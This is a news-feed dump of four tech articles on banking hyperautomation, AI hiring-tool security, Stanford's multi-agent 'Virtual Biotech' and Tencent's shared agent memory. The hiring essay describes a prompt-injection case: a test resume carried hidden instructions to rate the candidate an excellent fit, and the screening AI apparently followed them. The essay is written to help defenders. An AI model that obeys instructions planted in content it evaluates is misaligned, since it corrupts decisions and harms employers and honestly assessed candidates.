<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/figure-Figure-automation-vs-hyperautomation.png?w=1024" alt="Figure: Automation vs. hyperautomation." class="wp-image-4206308" width="1024" height="775" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Magesh Kasthuri</p></div>



<p class="wp-block-paragraph"><strong>Figure: Automation vs. hyperautomation</strong></p>



<p class="wp-block-paragraph">Embedded Generative AI adds a <a href="https://assets.ctfassets.net/5965pury2lcm/65QHMnfLGaRJzJ0sX5982o/520b5f0a9745aecc8730c645994e3a3b/Forrester_Study_-_AI_And_The_Next_Generation_of_Software_Testing.pdf">new layer of intelligence</a>. Instead of forcing every user interaction into rigid screens and codes, business applications can accept natural language prompts, interpret document content, summarize cases, generate draft responses, explain anomalies, produce test scenarios and create release notes. In a banking environment, this intelligence must be carefully bounded. Every AI-assisted action should be traceable, explainable, reviewable and aligned with data privacy, model risk, information security and regulatory expectations. The goal is not uncontrolled autonomy; the goal is governed acceleration.</p>



<h2 class="wp-block-heading">Banking application components suitable for hyperautomation</h2>



<p class="wp-block-paragraph">A modern banking application is rarely a single monolithic system. It is a composition of business capabilities, integration services, workflow engines, data pipelines, user experience layers, analytics models, control dashboards and audit stores. Hyperautomation can accelerate the development and integration of these components by turning repetitive engineering work into <a href="https://www.everestgrp.com/report/egr-2024-31-v-6318/">reusable patterns</a> and by embedding intelligence directly into business processes.</p>



<ul class="wp-block-list">
<li><strong>Trade reporting applications:</strong> Generative AI can help map trade attributes to regulatory fields, explain validation failures, summarize rejected submissions and generate test cases for reporting scenarios. Hyperautomation can orchestrate enrichment, validation, submission, acknowledgement tracking and evidence archival.</li>



<li><strong>Wealth management platforms:</strong> Advisors can use embedded AI to summarize client portfolios, generate suitability narratives, identify missing documents and prepare personalized investment review notes. Automation can coordinate onboarding, risk profiling, document verification, portfolio rebalancing workflows and client communication approvals.</li>



<li><strong>Core banking applications:</strong> Account opening, loan servicing, deposits, payments, interest calculations and customer maintenance can benefit from automated validations, intelligent forms, workflow routing and natural language assistance for operations teams. AI can explain account events or transaction exceptions in plain language.</li>



<li><strong>Investment banking systems:</strong> Deal pipelines, research workflows, underwriting processes, trade lifecycle functions and risk calculations require strong coordination across front-office, middle-office and back-office platforms. Hyperautomation can standardize approvals, documentation, exception resolution and control evidence across these stages.</li>



<li><strong>Digital compliance applications:</strong> Compliance teams can use AI to summarize policy obligations, compare regulatory changes with internal controls, classify alerts, draft investigation notes and produce evidence packs. Automation ensures routing, approvals, segregation of duties, audit trails and regulatory reporting timelines are consistently enforced.</li>



<li><strong>Reconciliation platforms:</strong> AI can assist in matching narratives, explaining breaks, clustering exception patterns and suggesting resolution actions. Hyperautomation can pull data from ledgers, statements, payment processors, trading systems and data warehouses, then route unresolved breaks to the right teams.</li>



<li><strong>Reporting and audit applications:</strong> Daily, weekly and monthly reports can be generated through controlled data pipelines, automated quality checks, narrative generation, variance explanations and approval workflows. Audit applications can preserve lineage, approvals, source extracts, model outputs and control attestations.</li>
</ul>



<h2 class="wp-block-heading">Embedded generative AI as an application capability</h2>



<p class="wp-block-paragraph">Embedding Generative AI into business applications should be treated as an architectural capability, not as a decorative chatbot. A banking application may use AI for search, summarization, reasoning support, content generation, code generation, policy interpretation or anomaly explanation. Each use case requires clear boundaries. The application must know which data the model can access, which actions require approval, what evidence must be captured and where deterministic controls must override probabilistic <a href="https://www.idc.com/resource-center/generative-ai/">suggestions</a>.</p>



<p class="wp-block-paragraph">For example, in trade reporting, an embedded AI assistant can explain why a transaction failed validation and suggest likely fields to review. However, the final correction should pass through rule-based validations, maker-checker approval and audit logging. In wealth management, AI may draft a client review note based on portfolio movements and risk profile, but the advisor must verify suitability, disclosures and final communication. In reconciliation, AI can propose likely matches or categorize break reasons, while the system preserves the original data, confidence score, reviewer action and final resolution path.</p>



<h2 class="wp-block-heading">Hyperautomating the product development lifecycle</h2>



<p class="wp-block-paragraph">The Product Development Lifecycle can itself become hyperautomated. Instead of treating ideation, analysis, design, development, testing, security review, release and operations as disconnected phases, enterprises can create an AI-assisted delivery loop where every stage produces structured artifacts that the next stage can consume. Platforms such as GitHub Copilot, Claude Code or Claude Cowork-style agentic development environments and OpenAI Codex can support this movement by helping teams reason over requirements, generate code, create tests, review changes, modernize legacy modules and produce <a href="https://www.cio.com/article/1307309/the-generative-ai-revolution-is-transforming-how-banks-work.html">documentation</a>. Their value increases when they are connected to repositories, issue trackers, design documents, build pipelines, test suites, security scanners, observability data and enterprise knowledge bases.</p>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><strong>PDLC Stage</strong></td><td><strong>Hyperautomation Opportunity</strong></td><td><strong>AI-Assisted Outcome</strong></td></tr><tr><td>Business discovery</td><td>Process mining, domain interviews, regulatory mapping, backlog creation</td><td>Structured epics, user stories, acceptance criteria, process maps and control requirements</td></tr><tr><td>Architecture and design</td><td>Reference architectures, API contracts, data models, event flows, security patterns</td><td>Architecture options, integration blueprints, threat-model prompts and design decision records</td></tr><tr><td>Development</td><td>Code generation, service scaffolding, UI component creation, data pipeline templates</td><td>Review-ready code increments, reusable components, migration utilities and integration adapters</td></tr><tr><td>Testing</td><td>Unit, integration, regression, performance, compliance and synthetic data testing</td><td>Generated test cases, defect reproduction steps, test automation scripts and coverage summaries</td></tr><tr><td>Security and compliance review</td><td>Static analysis, dependency checks, policy validation, evidence capture</td><td>Risk explanations, remediation suggestions, control traceability and approval evidence</td></tr><tr><td>Release and deployment</td><td>CI/CD orchestration, environment promotion, release notes, rollback preparation</td><td>Automated deployment packs, release summaries, operational checklists and change records</td></tr><tr><td>Operations and feedback</td><td>Observability, incident analysis, user feedback mining, backlog refinement</td><td>Incident summaries, root-cause hypotheses, improvement stories and reliability recommendations</td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Role of GitHub Copilot, Claude Cowork and Codex</h2>



<p class="wp-block-paragraph">GitHub Copilot is useful where developers need assistance inside the engineering flow: explaining code, generating functions, proposing tests, reviewing pull requests and helping teams move from issue to implementation. In a banking PDLC, it can accelerate microservice creation, API integration, batch processing logic, reconciliation rules, regulatory validation routines and UI workflows. When used with repository context and proper review discipline, it can reduce the time developers spend on repetitive coding while preserving human accountability for design and correctness.</p>



<p class="wp-block-paragraph">Claude Cowork or Claude Code-style agentic environments are valuable for multi-file reasoning, refactoring, debugging and documentation-heavy engineering work. Banking applications often contain deep domain logic scattered across services, configuration files, stored procedures, integration scripts and test suites. An agentic coding assistant that can understand a wider codebase context can help engineers analyze dependencies, prepare modernization plans, update multiple files coherently and draft explanations for reviewers. This is particularly useful in core banking modernization, trade reporting rule updates and compliance workflow refactoring.</p>



<p class="wp-block-paragraph">OpenAI Codex can support issue-to-pull-request workflows, test generation, code review, bug reproduction, migration activities and broader software engineering tasks across the lifecycle. In a hyperautomated PDLC, Codex-like agents can be assigned well-scoped work items, asked to inspect failing tests, propose fixes, create regression coverage and summarize the change for human reviewers. The important design principle is to keep agents inside controlled boundaries: clear prompts, repository permissions, test gates, approval workflows and traceable outputs.</p>



<h2 class="wp-block-heading">Integration architecture for hyperautomated banking applications</h2>



<p class="wp-block-paragraph">A practical architecture begins with business capability decomposition. Each banking domain should be expressed as a set of bounded capabilities such as customer onboarding, account maintenance, trade enrichment, exception management, portfolio review, control attestation, report generation and audit retrieval. These capabilities should be exposed through APIs, events, workflow tasks, data products and user interfaces. Hyperautomation then connects these capabilities using orchestration engines, event streams, rules engines, AI services, RPA connectors where legacy integration is unavoidable and observability layers that capture business and technical telemetry.</p>



<p class="wp-block-paragraph">The embedded AI layer should sit behind a secure application service boundary. It should use retrieval-augmented generation where approved policies, product rules, application documentation and regulatory mappings are retrieved from trusted sources. It should avoid uncontrolled exposure of sensitive customer information. Prompt templates, response validation, redaction, grounding checks, model monitoring and human-in-the-loop approval should be part of the production design. In banking, the most successful AI pattern is often not full automation but <a href="https://www.everestgrp.com/report/egr-2024-31-v-6318/">assisted</a> decisioning with strong controls.</p>



<h2 class="wp-block-heading">Example: Hyperautomated reconciliation and reporting flow</h2>



<p class="wp-block-paragraph">Consider a reconciliation application that compares ledger balances, payment files, trade settlement records and external statements. In a conventional model, operations teams spend significant time downloading files, running macros, investigating mismatches, documenting break reasons and preparing status reports. In a hyperautomated model, data ingestion is scheduled and monitored, schema checks run automatically, matching engines classify obvious matches, AI assists with ambiguous narratives, exceptions are routed through workflow queues and dashboards update in near real time. At the end of the day, the system can generate a draft operations <a href="https://www.pwc.com/us/en/industries/financial-services/library/hyperautomation-gen-ai-in-banking.html">report</a> explaining unresolved breaks, aging trends, risk exposure and pending approvals.</p>



<p class="wp-block-paragraph">The same pattern can extend to daily, weekly and monthly reporting. Data quality rules validate inputs, report templates are populated automatically, AI generates narrative commentary on variances, reviewers approve or amend explanations and the final report is archived with lineage and approvals. Audit teams can later retrieve not only the report but also the source extracts, transformation logs, exception history, reviewer decisions and AI-generated drafts. This creates a richer control environment than manual reporting because evidence is captured by design rather than reconstructed later.</p>



<h2 class="wp-block-heading">Governance, risk and control considerations</h2>



<p class="wp-block-paragraph">Hyperautomation in banking must be designed with governance from the beginning. The development team should define which activities can be automated, which can be AI-assisted and which must remain under human approval. Source code generated by AI must pass normal engineering controls, including peer review, static analysis, dependency scanning, secure coding checks, test execution and production readiness review. Business outputs generated by AI, such as compliance narratives or client-facing explanations, should be <a href="https://www.pwc.com/us/en/industries/financial-services/library/hyperautomation-gen-ai-in-banking.html">reviewed</a> where regulatory or reputational risk is material.</p>



<p class="wp-block-paragraph">Data governance is equally important. AI-enabled applications must respect data classification, residency, retention, masking and access policies. The model should not become an uncontrolled channel through which confidential customer, trading or employee information can leak. Every prompt, retrieved source, generated response, user action and final decision may need to be logged depending on the use case. For audit applications, this traceability is not optional; it is the foundation of trust.</p>



<h2 class="wp-block-heading">Operating model for AI-native PDLC</h2>



<p class="wp-block-paragraph">A hyperautomated PDLC requires changes in team behavior. Product owners should write requirements in a structured manner so that AI tools can generate better stories, acceptance criteria and test scenarios. Architects should maintain living decision records, reference patterns and integration standards that AI agents can use as context. Developers should learn prompt discipline, context packaging and review techniques. Test engineers should focus on coverage strategy, synthetic data, compliance scenarios and defect prevention rather than only manual execution. Operations teams should feed incident <a href="https://www.cio.com/article/1307309/the-generative-ai-revolution-is-transforming-how-banks-work.html">learnings</a> back into the backlog so the system improves continuously.</p>



<p class="wp-block-paragraph">The role of human experts becomes more important, not less. AI can draft, generate, compare and suggest, but domain judgment remains essential. A trade reporting specialist understands regulatory nuance. A wealth advisor understands client suitability. A core banking architect understands transaction integrity. A compliance officer understands control interpretation. Hyperautomation works best when it amplifies these experts and removes repetitive friction around them.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">Hyperautomation in business application development is not simply a faster way to write software. It is a new way to connect business intent, engineering execution, operational control and continuous learning. In banking, where applications must be reliable, explainable, secure and compliant, the combination of embedded Generative AI and disciplined automation can transform how applications are designed, built, integrated, tested, released and operated. Trade reporting, wealth management, core banking, investment banking, compliance, reconciliation, reporting and audit functions can all benefit when AI is embedded responsibly and automation is orchestrated across the complete lifecycle.</p>



<p class="wp-block-paragraph">Platforms such as GitHub Copilot, Claude Cowork or Claude Code and OpenAI Codex can play an important role in this transformation by accelerating analysis, development, testing, review, modernization and documentation. Their greatest value appears when enterprises treat them not as isolated productivity tools but as part of a governed, AI-native PDLC. The future of banking application development will belong to teams that can combine human expertise, reusable engineering patterns, intelligent automation and strong governance into one coherent delivery model.</p>



<p class="wp-block-paragraph"><em>This article was made possible by our partnership with the IASA </em><a href="https://chiefarchitectforum.org/" target="_blank" rel="noreferrer noopener"><em>Chief Architect Forum</em></a><em>. The CAF’s purpose is to test, challenge and support the art and science of Business Technology Architecture and its evolution over time as well as grow the influence and leadership of chief architects both inside and outside the profession. The CAF is a leadership community of the </em><a href="https://iasaglobal.org/" target="_blank" rel="noreferrer noopener"><em>IASA</em></a><em>, the leading non-profit professional association for business technology architects.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your AI hiring tool isn’t an HR problem. It’s a security one]]></title>
<description><![CDATA[For years, applicant tracking systems and recruiting platforms were treated as HR technology: Important for workflow, efficiency, compliance and candidate experience, but rarely viewed as core security infrastructure. That assumption no longer holds. Once AI begins reading resumes, scoring candid...]]></description>
<link>https://tsecurity.de/de/3710148/it-nachrichten/your-ai-hiring-tool-isnt-an-hr-problem-its-a-security-one/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710148/it-nachrichten/your-ai-hiring-tool-isnt-an-hr-problem-its-a-security-one/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:39 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For years, applicant tracking systems and recruiting platforms were treated as HR technology: Important for workflow, efficiency, compliance and candidate experience, but rarely viewed as core security infrastructure. That assumption no longer holds. Once AI begins reading resumes, scoring candidates, conducting interviews, ranking applicants and influencing who moves forward, the hiring platform stops being a passive system of record. It becomes a decision system.</p>



<p class="wp-block-paragraph">And any system that accepts public input, processes sensitive data and influences business decisions belongs inside the security conversation.</p>



<p class="wp-block-paragraph">I learned this during an AI hiring platform rollout that never made it to production. The vendor was established, the product had a strong market reputation and the AI feature looked attractive: Upload a resume, compare it to a job description and return a neat percentage match. For recruiters, it promised speed. For executives, it promised modernization.</p>



<p class="wp-block-paragraph">Before moving real candidate data into the system, I tested it with synthetic resumes. One weak resume came back with a surprisingly strong match. The reason was not hidden in the candidate’s experience. It was hidden in the text. The resume contained language instructing the AI to treat the candidate as an excellent fit, and the system appeared to follow that instruction instead of evaluating the resume on merit.</p>



<p class="wp-block-paragraph">That changed the question from “Does the tool improve productivity?” to “Can the person being evaluated influence the evaluation itself?”</p>



<p class="wp-block-paragraph">That is a security question.</p>



<h2 class="wp-block-heading">The trust boundary has moved</h2>



<p class="wp-block-paragraph">CIOs do not need to become recruiting experts. They only need to look at the mechanics.</p>



<p class="wp-block-paragraph">An anonymous user submits content into an enterprise system. That content is processed by software. The software then produces an output that can influence a business decision. In every other environment, security teams know what to call that: untrusted input crossing a trust boundary.</p>



<p class="wp-block-paragraph">The difference is that in hiring, the input looks harmless. It is a resume, a cover letter, a chatbot reply or a spoken answer in an AI-led interview. But once AI reads that content and treats it as instruction, the harmless-looking input becomes part of the system’s control surface.</p>



<p class="wp-block-paragraph">That is why prompt injection matters in hiring. It is not just an AI oddity or a model behavior issue. It is the same category of failure enterprises have spent decades trying to prevent: User-controlled input changing what the system does. <a href="https://genai.owasp.org/llmrisk/llm01-prompt-injection/">OWASP lists prompt injection as the first risk in its Top 10 for LLM applications</a>, describing it as a case where user prompts alter a model’s behavior or output in unintended ways.</p>



<p class="wp-block-paragraph">In hiring, the implication is direct: A candidate may be able to manipulate the score, ranking or interview assessment that determines whether a human ever sees them.</p>



<h2 class="wp-block-heading">The business impact is not theoretical</h2>



<p class="wp-block-paragraph">The obvious risk is that an unqualified candidate moves forward. But the impact is broader.</p>



<p class="wp-block-paragraph">First, decision quality degrades. Hiring teams adopt AI scoring because they believe it improves signal. If the score can be manipulated, the business is not gaining signal; it is gaining false confidence. Recruiters may spend time on candidates who gamed the system while stronger candidates are buried lower in the queue. A tool bought to reduce friction can quietly create more of it.</p>



<p class="wp-block-paragraph">Second, cost increases under the appearance of efficiency. Every false positive consumes recruiter time, hiring-manager attention, interview slots and opportunity cost. A small weakness in screening integrity can become a measurable operational drag across open roles.</p>



<p class="wp-block-paragraph">Third, trust suffers. Candidates already question whether AI hiring tools are fair, explainable or accurate. If it becomes clear that a screening system can be manipulated by hidden instructions or verbal prompting, the issue is no longer just security. It becomes reputational. Strong candidates may lose confidence in the process, and employers may have to defend decisions made by systems they did not fully understand.</p>



<p class="wp-block-paragraph">Fourth, sensitive data exposure becomes harder to contain. Recruiting systems hold names, addresses, work histories, education histories, compensation details, work authorization information and sometimes accommodation or demographic data. <a href="https://csrc.nist.gov/pubs/sp/800/122/final">NIST guidance on personally identifiable information</a> includes employment information as linkable personal data that must be protected from inappropriate access, use and disclosure. Yet hiring platforms often receive less security scrutiny than systems holding customer or financial data.</p>



<p class="wp-block-paragraph">That mismatch is dangerous: High-value data, public-facing workflows and increasing automation.</p>



<p class="wp-block-paragraph"><a href="https://www.csoonline.com/article/4020919/mcdonalds-ai-hiring-tools-password-123456-exposes-data-of-64m-applicants.html">The 2025 McHire incident</a> should have made this impossible to ignore. Researchers reported that weaknesses in McDonald’s AI hiring platform, including default credentials and an access-control flaw, exposed applicant data at large scale before the issue was patched. The lesson for CIOs is not merely that a weak password was used. The lesson is that AI hiring systems can ship with basic, preventable security failures while still being treated as HR tools rather than enterprise risk surfaces.</p>



<h2 class="wp-block-heading">Vendor reputation does not transfer to every AI feature</h2>



<p class="wp-block-paragraph">One reason this risk slips through is that buyers often trust the platform brand. Mature vendors may have strong security programs, enterprise customers, compliance documentation and procurement-friendly answers.</p>



<p class="wp-block-paragraph">But AI features can change the architecture of risk.</p>



<p class="wp-block-paragraph">A platform that was safe as a workflow tool may behave very differently once it adds resume scoring, interview grading, chatbot screening or automated ranking. The new feature may introduce new inputs, new model behavior, new data flows, new third-party dependencies and new decision points. In practical terms, the attack surface has changed.</p>



<p class="wp-block-paragraph">CIOs should not allow AI features to inherit trust automatically from the legacy platform around them. When a vendor adds AI, the enterprise should reassess the feature as if it were a new product. That does not mean slowing innovation for bureaucracy. It means AI-enabled decision-making carries different failure modes from ordinary workflow automation.</p>



<h2 class="wp-block-heading">The ownership gap is the real vulnerability</h2>



<p class="wp-block-paragraph">The biggest risk may not be the model. It may be the ownership gap.</p>



<p class="wp-block-paragraph">Talent acquisition may buy the tool. HR operations may configure it. The vendor may guide implementation. Procurement and legal may approve the contract. But who owns the security of the candidate-facing AI layer?</p>



<p class="wp-block-paragraph">In many organizations, the honest answer is unclear.</p>



<p class="wp-block-paragraph">That ambiguity is where risk grows. Recruiting technology sits at the intersection of public input, sensitive data, third-party software, automated decision support and brand trust. That is exactly the kind of environment that needs named security ownership, asset inventory, vendor review, access-control testing, logging and incident-response planning.</p>



<p class="wp-block-paragraph">If the hiring stack is not in the security inventory, the organization is already making an assumption it may later regret.</p>



<h2 class="wp-block-heading">What CIOs should require now</h2>



<p class="wp-block-paragraph">The fix is not exotic. It is applying existing security discipline to a surface that has been underestimated.</p>



<p class="wp-block-paragraph">Treat every candidate submission as untrusted input. Resumes, cover letters, chatbot responses, interview transcripts and spoken answers should be handled as attacker-controllable content. If AI processes it, the system must separate content from instruction.</p>



<p class="wp-block-paragraph">Reassess vendors when AI features are introduced. A prior security review should not be treated as permanent approval for new AI capabilities. Ask what changed in the architecture, what data the model sees, what actions it can influence and how manipulation attempts are detected.</p>



<p class="wp-block-paragraph">Ask AI-specific questions before signing. Can candidate-provided content alter scoring? Are hidden instructions filtered or ignored? Is there human review before AI output influences a decision? Can the vendor produce testing evidence for prompt injection, access control and data exposure risks?</p>



<p class="wp-block-paragraph">Assign ownership. HR can own the process, but security must own the risk model. AI hiring systems should be included in third-party risk management, application security reviews, access governance, monitoring and incident response planning.</p>



<p class="wp-block-paragraph">Measure business impact, not just AI adoption. The goal is not to say the recruiting function uses AI. The goal is to improve hiring speed, quality, fairness and cost without creating new risk. If the system cannot protect decision integrity, the business case is weaker than it appears.</p>



<h2 class="wp-block-heading">The hiring platform is now part of the enterprise attack surface</h2>



<p class="wp-block-paragraph">AI has turned the careers page into more than a front door for applicants. It is now a public input channel feeding systems that store sensitive data and influence workforce decisions.</p>



<p class="wp-block-paragraph">That makes it a CIO concern.</p>



<p class="wp-block-paragraph">The next failure in AI hiring may not look like a traditional breach at first. It may look like bad rankings, manipulated scores, unexplainable decisions, wasted recruiter time or a candidate process no one trusts. But underneath those symptoms is a familiar security problem: A system trusted input it should have treated as hostile.</p>



<p class="wp-block-paragraph">Enterprises have hardened payment systems, customer portals, APIs and employee applications around that lesson. Hiring deserves the same treatment.</p>



<p class="wp-block-paragraph">AI hiring is not just an HR transformation. It is a security boundary. And it is time CIOs treated it like one.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Stanford is running 37,000 AI agents as a virtual biotech — and one of its drug designs got independently confirmed by Merck]]></title>
<description><![CDATA[For developers, the operating assumption has been one engineer, one agent — the model Claude Code and similar tools. At VB Transform 2026, James Zou, associate professor of biomedical data science at Stanford University, argued that assumption is about to break: the next frontier isn't a single, ...]]></description>
<link>https://tsecurity.de/de/3710115/it-nachrichten/stanford-is-running-37000-ai-agents-as-a-virtual-biotech-and-one-of-its-drug-designs-got-independently-confirmed-by-merck/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710115/it-nachrichten/stanford-is-running-37000-ai-agents-as-a-virtual-biotech-and-one-of-its-drug-designs-got-independently-confirmed-by-merck/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:33 +0200</pubDate>
<content:encoded><![CDATA[<p>For developers, the operating assumption has been one engineer, one agent — the model Claude Code and similar tools. <a href="https://venturebeat.com/vbtransform2026">At VB Transform 2026</a>, James Zou, associate professor of biomedical data science at Stanford University, argued that assumption is about to break: the next frontier isn't a single, more capable agent, it's tens of thousands of them collaborating.</p><p>For developers and product builders, the most critical takeaway from Zou’s presentation is how these massive systems are orchestrated. His team's research offers a practical blueprint for connecting legacy databases to AI orchestration layers and designing environments that enable thousands of agents to collaborate.</p><div></div><h2>Emulating the organization — the virtual biotech</h2><p>Zou’s project began as a "Virtual Lab" consisting of five to eight agents structured to mirror his physical Stanford lab. The setup included an AI professor acting as the principal investigator and AI students with distinct specialties holding regular group meetings. </p><p>"We also created for the agents a replica of Stanford, an agent school, where the agents can actually go to the school and do supervised fine-tuning to improve their expertise in their specific domains," Zou noted.</p><p>The virtual lab successfully designed new nanobody proteins for recent COVID variants. </p><p>"What is really exciting to us is that these AI-designed nanobody proteins actually worked much better than the previous human-designed nanobodies in terms of binding to the recent different viruses," Zou said.</p><p>Following this wet-lab validation, the team expanded their ambition. They transitioned from emulating a single research team to modeling a massive corporate structure. </p><p>The resulting system, dubbed the <a href="https://www.biorxiv.org/content/10.64898/2026.02.23.707551v1">Virtual Biotech</a>, comprises tens of thousands of specialized AI agents overseen by a Chief Scientific Officer (CSO) agent. It operates through distinct corporate divisions, such as target discovery, molecule design, and clinical trials.</p><p>"Working with the CSO agent are different divisions that mirror the divisions found in a human biotech or pharma company," Zou explained — one focused on identifying drug targets, another on designing molecules, a third on safety and clinical trials. Individual agents specialize further within a division, he said. "Under the target discovery division, we'll have one agent that specializes in looking at all the genetics data, another agent that looks at all the genomics data and single-cell data, and so on."</p><h2>The multi-agent advantage</h2><p>As foundation models grow more capable, developers face a core architectural dilemma: Why distribute workloads across tens of thousands of specialized agents instead of channeling all computing resources into a single, omniscient model?</p><p>Zou's team ran a head-to-head comparison of a multi-agent team against a single agent tasked with the same scientific challenge. The multi-agent ecosystem created friction and interaction that produced better solutions that were more resilient against compounding errors.</p><p>"In these scientific virtual labs, the agents actually get into debates and disagreements. They have to convince the other AI scientists [of] their ideas, and all of that elicits much more creative and robust reasoning compared to if you have a single model trying to do the problem by itself from scratch," Zou said.</p><h2>The orchestration bottleneck</h2><p>When scaling to tens of thousands of agents, orchestration becomes the primary bottleneck. The system requires a unified context layer that allows agents to synthesize knowledge from various tools, datasets, and historical records.</p><p>Many enterprise teams attempt to solve data integration by wrapping existing databases with an MCP. However, legacy systems are not very friendly to agents. For instance, dropping a PDF of a research paper into an agent's context window is inefficient, and standard text models struggle to interpret complex figures and tables, leading to hallucinations. </p><p>"Even if you wrap an MCP around the existing databases and APIs, that doesn't solve the underlying problem: the interface and APIs are not suitable for agents," Zou said. He added that existing databases are designed to be consumed by humans or pre-AI algorithms.</p><p>To resolve this, Zou's team created <a href="https://github.com/GXL-ai/paperclip">Paperclip</a>. The platform relies on a core strength of modern LLMs: their ability to write code and navigate file systems. Instead of forcing agents to query brittle, database-specific APIs, Paperclip digitizes unstructured data and maps disparate databases into a unified, AI-native virtual file system.</p><p>This structure allows agents to access knowledge from millions of papers using standard file-system operations. </p><p>"This basically shows that we can get much better accuracy if you use Paperclip, and we can reduce the time and the cost by over an order of magnitude compared to if you use agents without these AI-native scientific infrastructures," Zou stated.</p><h2>Real-world validation</h2><p>To test the practical output of this architecture, Virtual Biotech spun up 37,000 "clinical trial agents" to synthesize fragmented trial data. These agents identified single-cell features that predict trial success — drug targets supported by these features were about 50% more likely to reach market than comparable drugs without them.</p><p>The system then autonomously designed an antibody-drug conjugate (ADC) targeting the CD276 protein for lung cancer. The agents completed this design autonomously, relying exclusively on data published prior to January 2025.</p><p>Several months later, Zou said, pharmaceutical company Merck independently developed and validated the same therapeutic design — which went on to receive breakthrough designation from the FDA. He characterized this as "a third-party external validation of the therapeutic design provided by the virtual biotech agents."</p><h2>Designing ecosystems, not workflows</h2><p>As multi-agent systems scale, leaders must rethink how they manage these digital workforces. Zou advocated for shifting from designing rigid workflows to creating open environments. Workflows dictate the exact steps an agent should take, similar to managing a junior employee. Environments provide the infrastructure, guardrails, and incentives for agents to collaborate on open-ended problems. </p><p>"In workflows, we're trying to tell agents what to do and how to do their job. But in environments, we're providing the infrastructures, the incentives, and the guardrails, but otherwise we leave it open to incentivize agents to collaborate," Zou said.</p><p>Optimization at scale means engineering the environment rather than fine-tuning individual models. While single agents can improve via reinforcement learning or supervised fine-tuning in the agent school, the success of a massive multi-agent system relies on adjusting the parameters governing their collaboration. </p><p>"At the multi-agent [side], we're not actually fine-tuning and changing the individual models anymore, but we're optimizing the environment," Zou explained. "The environment itself is the object that we optimize to improve the agents."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tencent's Team Memory shares AI agent memory across a team — with no governance yet for when it's wrong]]></title>
<description><![CDATA[A VB Pulse survey this June found that 57% of enterprises had traced a confidently wrong agent answer back to missing or inconsistent context — the latest sign of how central context has become to whether AI agents can be trusted to act on their own.Most of the fixes so far have solved a narrower...]]></description>
<link>https://tsecurity.de/de/3710116/it-nachrichten/tencents-team-memory-shares-ai-agent-memory-across-a-team-with-no-governance-yet-for-when-its-wrong/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710116/it-nachrichten/tencents-team-memory-shares-ai-agent-memory-across-a-team-with-no-governance-yet-for-when-its-wrong/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:33 +0200</pubDate>
<content:encoded><![CDATA[<p>A <a href="https://venturebeat.com/data/57-of-enterprises-have-watched-ai-agents-be-confidently-wrong-the-fix-is-an-agentic-context-layer-but-who-has-one">VB Pulse survey this June found that 57%</a> of enterprises had traced a confidently wrong agent answer back to missing or inconsistent context — the latest sign of how central context has become to whether AI agents can be trusted to act on their own.</p><p>Most of the fixes so far have solved a narrower version of that problem: one agent remembering more, in one session. What's been missing is a way for a team of agents to draw on the same context at once, and that gap is where a newer problem is surfacing. Once an agent's context is shared across a whole team, a wrong fact doesn't cost one person a repeated explanation. It costs the whole team.</p><p>Tencent's answer to that gap is<a href="https://github.com/TencentCloud/TencentDB-Agent-Memory"> Agent Memory</a>, an open-source project the team said grew out of six months spent fixing a narrower problem: agents losing context in long sessions. Part of that system is a persona layer, a stable, distilled picture of who a user is and how they work, built up over many conversations rather than reconstructed each time. On Tencent's own benchmark for whether an agent still applies that picture correctly after extended use, accuracy rose from 48% to 76%, a 59% relative improvement, once the persona layer was added. This week, Tencent extended that project with the beta launch of Team Memory, which opens the same approach up to a whole team instead of one agent. <!-- -->Tencent said <a href="https://x.com/tencentai_news/status/2085272380759581092">the repo hit No. 1 on GitHub's TypeScript trending list</a> this week.</p><p>Agents on a team can now read from a shared memory hub instead of keeping separate, siloed context, governed through an access control layer that determines who can read what.</p><h2>What Team Memory actually does</h2><p>The core idea is a shared hub rather than a shared prompt. Instead of pasting one large context block into every agent's window, Team Memory registers four kinds of reusable assets and equips each agent with only the ones it needs.</p><ul><li><p><b>Chat Memory.</b> Retains preferences, facts, decisions, and interaction history, distilled through four layers, from raw conversation up to a stable long-term persona, so an agent does not need to be reintroduced to a user it has already worked with.</p></li><li><p><b>Skill.</b> Captures procedures pulled from completed work, versioned and reviewed before they are shared rather than dropped into a folder as-is.</p></li><li><p><b>LLM-Wiki.</b> Turns documents and specs into structured, linked pages.</p></li><li><p><b>Code-Graph.</b> Indexes a codebase's symbols, files, and call relationships so an agent can check what a change might affect before making it.</p></li></ul><p>Tencent's<a href="https://github.com/TencentCloud/TencentDB-Agent-Memory"> documentation</a> draws the distinction directly: "RAG answers 'what can be found?' Team Memory also answers 'who can use it, which version is valid, and which Agent should receive it.'"

